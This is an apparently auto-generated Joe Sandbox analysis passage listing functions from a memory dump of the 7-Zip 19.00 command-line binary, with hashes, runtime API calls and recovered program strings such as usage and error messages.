                                                                                                                                        • Opcode Fuzzy Hash: 5dcf686a09ca25460ee6151b015904e6cf6bf16efac6897398dd48f79e9a8534
                                                                                                                                        • Instruction Fuzzy Hash: B9A19722674681C1CB28EF16E45156EB764EBD27D0F901112FB9E47B69DF28C8EACF00
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: a5da411e75573f0648736714f517a5bbb6ba3fc978bf78ef7329a5e2f6ab8de4
                                                                                                                                        • Instruction ID: 62bec9432edf38c040d1692e366889643c5fb9e1165c79fed7b6c68f9b7341c9
                                                                                                                                        • Opcode Fuzzy Hash: a5da411e75573f0648736714f517a5bbb6ba3fc978bf78ef7329a5e2f6ab8de4
                                                                                                                                        • Instruction Fuzzy Hash: 5251612B621AC0C9C725FE32D85126D6325FBD6F98F990172EF2D1B79ADF20C8568710
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: fputs$free$fputc
                                                                                                                                        • String ID: Error:$ file$Everything is Ok$Scan WARNINGS for files and folders:$Scan WARNINGS: $WARNING: Cannot open $WARNINGS for files:
                                                                                                                                        • API String ID: 2662072562-1527772849
                                                                                                                                        • Opcode ID: cf38ecbc90f80cce91f4804fd03da9a44f36afd14dcff60acdae5e80679d7744
                                                                                                                                        • Instruction ID: 9e8ca6b0f37048ee7a3b180f1bd52c53fb0c313a47c254c77521f2b845661e0c
                                                                                                                                        • Opcode Fuzzy Hash: cf38ecbc90f80cce91f4804fd03da9a44f36afd14dcff60acdae5e80679d7744
                                                                                                                                        • Instruction Fuzzy Hash: 7B51A47A32554182CF24FF22D69876E7321FB85BD9F844125EE5E076A9CF28C969CB00
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1534225298-0
                                                                                                                                        • Opcode ID: 487434742999afad6c6a49a55d089b6f01de136bf747d36331bc54ee911b7c32
                                                                                                                                        • Instruction ID: 4998768362df648a58caca441d18fe5e824a1edef2e5978446c06e93a600e858
                                                                                                                                        • Opcode Fuzzy Hash: 487434742999afad6c6a49a55d089b6f01de136bf747d36331bc54ee911b7c32
                                                                                                                                        • Instruction Fuzzy Hash: EC7199222259C191CB14EF26E49179EA760FBC27D0F545112FF9D57769DF28C8AACF00
                                                                                                                                        APIs
                                                                                                                                        • free.MSVCRT ref: 0027187D
                                                                                                                                          • Part of subcall function 00242130: malloc.MSVCRT ref: 00242134
                                                                                                                                          • Part of subcall function 00242130: _CxxThrowException.MSVCRT ref: 0024214F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionThrowfreemalloc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2861928636-0
                                                                                                                                        • Opcode ID: 1abd917d171c3782fa9e5eddb773532783a02a760b8192a03757b26f22e47c7e
                                                                                                                                        • Instruction ID: 0727595e0c1d7c98a729f49f3010f2513e87f43d85daf6a4babb2b69bda5ecf7
                                                                                                                                        • Opcode Fuzzy Hash: 1abd917d171c3782fa9e5eddb773532783a02a760b8192a03757b26f22e47c7e
                                                                                                                                        • Instruction Fuzzy Hash: 98814F32225BC5C1CB64DF26E450BAE67A8FBD6B84F515012DB8E53B15CF38C4AACB04
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: 604b93e9740048c82800e9d74cf7720333369c55d8207d772f7bb48edf82253e
                                                                                                                                        • Instruction ID: 901d6420ac460fb8a011244be760a92fdc72bad003415385fe65051f01176fa9
                                                                                                                                        • Opcode Fuzzy Hash: 604b93e9740048c82800e9d74cf7720333369c55d8207d772f7bb48edf82253e
                                                                                                                                        • Instruction Fuzzy Hash: FC31C9226219C0C5CB15BE37DC512AC6364EF82F94F590171AF2D5B76ACE20C8AA8754
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$memmove
                                                                                                                                        • String ID: 2$3$?$?$Z
                                                                                                                                        • API String ID: 1534225298-3338962022
                                                                                                                                        • Opcode ID: 84abab613373cf7922060763a3c287b9f684fa76ebb682cbcf5688f653a5ccb0
                                                                                                                                        • Instruction ID: 3ca541dfb6fce42ebb97013c2f9742961519118b65e2e739ca024a21077c1e2a
                                                                                                                                        • Opcode Fuzzy Hash: 84abab613373cf7922060763a3c287b9f684fa76ebb682cbcf5688f653a5ccb0
                                                                                                                                        • Instruction Fuzzy Hash: 08C1923223468192CF34DF25D88156EB771FBD9B84F918112EA9E83B29DE78CD65CB01
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: ca853514d698da322178c764a93f6451d2681f45a97f5268fbff0ab336d04f61
                                                                                                                                        • Instruction ID: b8bae787a4a44c60152e9c3e33f74feda242df4d496574ec8839b4a6fda78fac
                                                                                                                                        • Opcode Fuzzy Hash: ca853514d698da322178c764a93f6451d2681f45a97f5268fbff0ab336d04f61
                                                                                                                                        • Instruction Fuzzy Hash: 60513B33722A8089CB19EE36C4A466D6320FF86FDAB495172EF1E1B719CF34C9598314
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$wcscmp
                                                                                                                                        • String ID: ..\
                                                                                                                                        • API String ID: 4021281200-2756224523
                                                                                                                                        • Opcode ID: 7888456042c53789908d25aad9b3813a7becaf42d114683dbdf658571ea549be
                                                                                                                                        • Instruction ID: d339b43270f5d73ea843b9391b1599db4ee4de95d78346b34b21bab335343b4f
                                                                                                                                        • Opcode Fuzzy Hash: 7888456042c53789908d25aad9b3813a7becaf42d114683dbdf658571ea549be
                                                                                                                                        • Instruction Fuzzy Hash: 53617C22724A8186CB24EE16E49021EB734FFD5B98F999121FF4E1B759DF78C856CB00
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: fputs$free$fputc
                                                                                                                                        • String ID: Modified: $Path: $Size:
                                                                                                                                        • API String ID: 2662072562-3207571042
                                                                                                                                        • Opcode ID: 496fa3ffaf823c2aebc81c865e07b2af86b11c6c8c3a8b9c12195a7aa1bd88ef
                                                                                                                                        • Instruction ID: 8c4ca9131a8ed77505c45b1490f118986654acbab0c35e1aba62d15c5c3e06b2
                                                                                                                                        • Opcode Fuzzy Hash: 496fa3ffaf823c2aebc81c865e07b2af86b11c6c8c3a8b9c12195a7aa1bd88ef
                                                                                                                                        • Instruction Fuzzy Hash: F721676A31194181DE54EF26E99436D2321FB86BEDF849262EE3D036E4DF28C52EC700
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: 60ace95fb2fc5c6a18f45500c31a94f926098c19aa9c7a83c51038a5c2569c48
                                                                                                                                        • Instruction ID: e1d45a542316de428002f792e881801161d09bc7fa9a713f8841a237790ade53
                                                                                                                                        • Opcode Fuzzy Hash: 60ace95fb2fc5c6a18f45500c31a94f926098c19aa9c7a83c51038a5c2569c48
                                                                                                                                        • Instruction Fuzzy Hash: 46C16127335580D2CB28EF2AD48016EA760F7C5B40FA45122FB4E57B29DF79C965CB00
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID: h&
                                                                                                                                        • API String ID: 1294909896-3089496992
                                                                                                                                        • Opcode ID: 39b8cec8f745fed26984906838960d0e51b3b300ba3bdf38eae154028cfe0150
                                                                                                                                        • Instruction ID: 5a22adb960f65a69e1bc7e93f76175547bd65d4e8b3b149a6b2fab45d52668cf
                                                                                                                                        • Opcode Fuzzy Hash: 39b8cec8f745fed26984906838960d0e51b3b300ba3bdf38eae154028cfe0150
                                                                                                                                        • Instruction Fuzzy Hash: 32E18A36329B8192DB94DF26D59475E77A4F788B84F508022EF8E43B25DF78C8A5CB10
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$memmove$ExceptionThrow
                                                                                                                                        • String ID: Incorrect volume size:
                                                                                                                                        • API String ID: 3957182552-1799541332
                                                                                                                                        • Opcode ID: 4436e24a10e8fc572d61ba3777d2b135a9ae8f78e93ce841be10de43e0223506
                                                                                                                                        • Instruction ID: 5ebb7607c41c6d41df67af4c00ec83f20094a7fa6c3c3cc83bb9f716d6d56e13
                                                                                                                                        • Opcode Fuzzy Hash: 4436e24a10e8fc572d61ba3777d2b135a9ae8f78e93ce841be10de43e0223506
                                                                                                                                        • Instruction Fuzzy Hash: 6C518D72224AC492DB24EF26D8D03AD7360F785B88F844122EF9D477A5DF78C5A9CB44
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: a65a4842f4bdc42e1f5212434264471e2b9b6027c96c7e5650b44ef85e500095
                                                                                                                                        • Instruction ID: c38c635c0f6f6ab9d907edd94c0642773d74fd902889ecdb93fe8ca140775214
                                                                                                                                        • Opcode Fuzzy Hash: a65a4842f4bdc42e1f5212434264471e2b9b6027c96c7e5650b44ef85e500095
                                                                                                                                        • Instruction Fuzzy Hash: 0B71B122268A81C1DB14EF26E85036D77A5FB85BE5F440122BF5E87765DF38C4AAC704
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0024339C: free.MSVCRT ref: 002433D7
                                                                                                                                          • Part of subcall function 0024339C: memmove.MSVCRT(00000000,?,?,00000000,002410A8), ref: 002433F2
                                                                                                                                        • free.MSVCRT ref: 0024A90A
                                                                                                                                        • free.MSVCRT ref: 0024A9AD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$memmove
                                                                                                                                        • String ID: /$\
                                                                                                                                        • API String ID: 1534225298-1600464054
                                                                                                                                        • Opcode ID: f198c9d99514ce9e4ce6b0316728f7062312fdaa462ade4dde103b6963418a90
                                                                                                                                        • Instruction ID: a695db8fbcc6673206c18b808be651d9a2db0138e249765b9a4424dffa7fa9ad
                                                                                                                                        • Opcode Fuzzy Hash: f198c9d99514ce9e4ce6b0316728f7062312fdaa462ade4dde103b6963418a90
                                                                                                                                        • Instruction Fuzzy Hash: B751B222274641E1CF2CFF22D5510BE6774EB867D4B805122FB4E47666DF68C9AACF02
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        • Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values, xrefs: 00288640
                                                                                                                                        • 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21, xrefs: 00288630
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$fputs$memmove
                                                                                                                                        • String ID: 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21$Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values
                                                                                                                                        • API String ID: 2337578458-4238946813
                                                                                                                                        • Opcode ID: fc1f1692e1a7be690a265933f0a82059642291962d2ae098a8720eef4c07a75c
                                                                                                                                        • Instruction ID: 51868f2a2a462895c6b47dc3d2e6a8e32788d213756448f1cd8be9df0a193b3d
                                                                                                                                        • Opcode Fuzzy Hash: fc1f1692e1a7be690a265933f0a82059642291962d2ae098a8720eef4c07a75c
                                                                                                                                        • Instruction Fuzzy Hash: 791181673226D186CB20EF15E98436EB322FB85B90F944022DF5D17759DF38C8AACB01
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        • Cannot find listfile, xrefs: 0024FF12
                                                                                                                                        • The file operation error for listfile, xrefs: 0024FF71
                                                                                                                                        • Incorrect item in listfile.Check charset encoding and -scs switch., xrefs: 0024FFDA, 0025000E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$ExceptionThrow
                                                                                                                                        • String ID: Cannot find listfile$Incorrect item in listfile.Check charset encoding and -scs switch.$The file operation error for listfile
                                                                                                                                        • API String ID: 4001284683-1604901869
                                                                                                                                        • Opcode ID: 96405dd8fb92279f030b02bc931f9dc36b9c89402a3ea1ebc254a3a14f5713aa
                                                                                                                                        • Instruction ID: 8b1677b63f327d6d228d3756eb5232243887f1b0ae98c32a168a008394e17033
                                                                                                                                        • Opcode Fuzzy Hash: 96405dd8fb92279f030b02bc931f9dc36b9c89402a3ea1ebc254a3a14f5713aa
                                                                                                                                        • Instruction Fuzzy Hash: D551A17233468592CA20EF16E8D079EB721FB96794F900116EF9D13A99DFB8C959CB00
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$ErrorLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 408039514-0
                                                                                                                                        • Opcode ID: 56e310f5247428a7174e856c66c809f8f157f3f47fc266d476a18a669d8f27e7
                                                                                                                                        • Instruction ID: 0047a2b5e1ff24ff4ac94b5c18269335fa116269afa344915bea742ffb087432
                                                                                                                                        • Opcode Fuzzy Hash: 56e310f5247428a7174e856c66c809f8f157f3f47fc266d476a18a669d8f27e7
                                                                                                                                        • Instruction Fuzzy Hash: B8519C2263C940D2DB28EF25E49156EA760EFD1790F901112BBAE47679DF64CD5ACF00
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: fputs
                                                                                                                                        • String ID: = $ERROR$ERRORS:$WARNING$WARNINGS:
                                                                                                                                        • API String ID: 1795875747-2836439314
                                                                                                                                        • Opcode ID: bfaef9fa8df0d205eec04fe16e9a27ef95300a9a3da73fd13572728b12155a0b
                                                                                                                                        • Instruction ID: a302c574e95574a616cd38fe8d1658e95e2c00c82c4a949d716c1fe4cddf7a91
                                                                                                                                        • Opcode Fuzzy Hash: bfaef9fa8df0d205eec04fe16e9a27ef95300a9a3da73fd13572728b12155a0b
                                                                                                                                        • Instruction Fuzzy Hash: 261163BA32159196EB25EF26E9497596720F705FC5F44C022CF4D03AA4DF78CAB9C700
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: fputs$free
                                                                                                                                        • String ID: $ MB$ Memory =
                                                                                                                                        • API String ID: 3873070119-2616823926
                                                                                                                                        • Opcode ID: 07695d8419c59f003fa7f84926a4645375bf0ceb04becd9a3de262dbf0bc1305
